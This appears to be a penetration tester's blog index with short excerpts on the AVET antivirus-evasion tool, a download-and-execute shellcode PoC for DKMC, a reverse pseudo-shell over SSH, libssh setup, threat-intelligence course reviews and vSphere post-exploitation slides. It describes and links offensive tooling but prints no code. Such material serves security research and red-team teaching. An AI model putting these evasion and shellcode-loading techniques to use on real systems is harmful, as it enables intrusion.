-
Avet setup.sh script
Now there is a setup.sh script for easier installation of AVET (thanks to https://github.com/tacticaljmp). Tested with kali linux 2018.3a. I made two short videos: After starting the script you may have to wait for a couple of minutes. Then click trough the installation routine for the compiler: … and you are done. Download AVET: https://github.com/govolution/avet
-
Paper AVET BLACKHAT USA ARSENAL 2018
Here is the paper for the Blackhat Arsenal 2018 AVET presentation: https://govolution.files.wordpress.com/2018/08/blackhat_usa_2018_arsenal.pdf Thanks to Nina and Florian for reviewing & improving!
-
Review Cybrary Advanced Cyber Threat Intelligence
Since I found that some information was missing from this course https://govolution.wordpress.com/2018/06/30/review-udemy-certified-cyber-threat-intelligence-analyst/ I found a course on cybrary, which is only about 3 hours long and which is free. So the review will also be a bit shorter. For the content please review: https://www.cybrary.it/course/advanced-cyber-threat-intelligence/ Module 1 – Threat Intelligence Maturity Model is the intro, with…
-
Review Udemy “Certified Cyber Threat Intelligence Analyst”
As a second course (see previous blog post for the first course) I bought “Certified Cyber Threat Intelligence Analyst” which has the same instructor as “Certified Advanced Persistent Threat Analyst”. Section 1: Phases Overview The first three videos give an overview on the agenda (hunting, features&behavior extraction, attribution, tracking and take down). The two videos…
-
Review Udemy “Certified Advanced Persistent Threat Analyst”
Although being a Pentester, I am also into that topic, since I also got some Incident Response experience. So I took the course as a wrap up for myself, in a special offer the course costs about 10$ instead of about 100$. The course is starting with a short introduction of the instructor, followed by…
-
Download & Exec PoC and DKMC
DKMC is a tool that writes shellcode into valid pictures and was written by Mr.Un1k0d3r (https://twitter.com/MrUn1k0d3r). I wrote a PoC that can be used here (and of course also for other raw shellcode). The PoC is downloading a shellcode file into memory and then execute the shellcode. Download DKMC: https://github.com/Mr-Un1k0d3r/DKMC Update: The PoC is now…
-
Recommended Talks for the New Year (34C3, BH)
A new year always brings the talks from the Chaos Communication Congress. Since I had some time for watching, here is a list with my tweets of recommended talks (plus one from Blackhat). Have fun watching. 34C3 talk 1-day exploit development for Cisco IOS by @artkond https://t.co/OvoCBvGzxc — Daniel Sauder (@DanielX4v3r) December 28, 2017 34C3…
-
Reverse (Pseudo) Shell over SSH
So after exploring libssh a little bit I wanted to do something useful, so my idea was to have a kind of a reverse (pseudo) shell that works via SSH. the client connects to the ssh server of the attacker with a port forward on the attacker machine port 8080 will be opened on localhost…
-
libssh first steps
Here I describe some first steps for using libssh on an old setup (WinXP with Visual Studio 2008). I think steps for other platforms are more or less similar. OpenSSL: Win32OpenSSL-1_0_2m.exe from http://slproweb.com/products/Win32OpenSSL.html -> Install it. zlib123dll.zip from http://www.winimage.com/zLibDll/ zlibwapi.dll renamed to zlib1.dll -> I placed it into my working directory. libssh-0.7.2-msvc.zip from https://red.libssh.org/projects/libssh/files ->…
-
Slides Post Exploitation and Attack Vectors in vSphere
Slides from Owasp Meeting Cologne 14.09.17: Post_Exploitation_and_Attack_Vectors_in_vSphere